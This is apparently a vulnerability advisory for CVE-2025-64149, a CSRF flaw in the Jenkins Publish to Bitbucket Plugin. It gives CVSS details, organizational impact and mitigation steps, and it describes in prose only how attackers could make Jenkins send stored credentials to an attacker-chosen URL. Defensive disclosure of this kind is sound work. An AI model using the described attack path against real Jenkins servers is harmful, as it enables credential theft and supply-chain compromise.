CVE-2025-64149 is a cross-site request forgery (CSRF) vulnerability identified in the Jenkins Publish to Bitbucket Plugin version 0.4 and earlier. This vulnerability allows an attacker to exploit the plugin's functionality to make Jenkins connect to an attacker-specified URL using credentials IDs that the attacker has obtained through other means. The core issue arises because the plugin does not properly validate the authenticity of requests, allowing CSRF attacks that can leverage stored credentials within Jenkins. The attacker requires low privileges (PR:L) but no user interaction (UI:N) is needed to exploit this vulnerability, and the attack can be performed remotely (AV:N). The vulnerability impacts confidentiality and integrity by enabling credential theft and unauthorized actions but does not affect availability. The CVSS score of 5.4 (medium severity) reflects these factors. No patches or fixes are currently linked, and no known exploits have been reported in the wild. The vulnerability is classified under CWE-352 (Cross-Site Request Forgery). Given Jenkins' widespread use in continuous integration and deployment pipelines, this vulnerability poses a risk of credential compromise, potentially leading to further unauthorized access or code injection in development environments.

For European organizations, this vulnerability could lead to unauthorized access to sensitive credentials stored in Jenkins, which may be used to access Bitbucket repositories or other integrated services. This compromises the confidentiality and integrity of source code and development pipelines, potentially allowing attackers to inject malicious code or disrupt software delivery processes. Organizations relying heavily on Jenkins for CI/CD, especially those integrating with Bitbucket, face increased risk of supply chain attacks or intellectual property theft. The lack of user interaction requirement and remote exploitability increase the risk of automated attacks. The impact is particularly significant for sectors with stringent compliance requirements such as finance, healthcare, and critical infrastructure, where unauthorized code changes or data leaks could have severe consequences.

1. Immediately restrict access to Jenkins instances running the Publish to Bitbucket Plugin version 0.4 or earlier by limiting network exposure and enforcing strong authentication and authorization controls. 2. Monitor Jenkins logs for unusual or unauthorized requests that may indicate exploitation attempts. 3. Remove or disable the vulnerable plugin until a patched version is released. 4. Implement web application firewalls (WAFs) or reverse proxies with CSRF protection rules to block suspicious requests targeting Jenkins endpoints. 5. Enforce the principle of least privilege for Jenkins users and credentials to minimize the impact of compromised credentials. 6. Regularly audit and rotate credentials stored in Jenkins to reduce the window of opportunity for attackers. 7. Stay updated with Jenkins security advisories and apply patches promptly once available. 8. Educate development and DevOps teams about the risks of CSRF and secure plugin usage.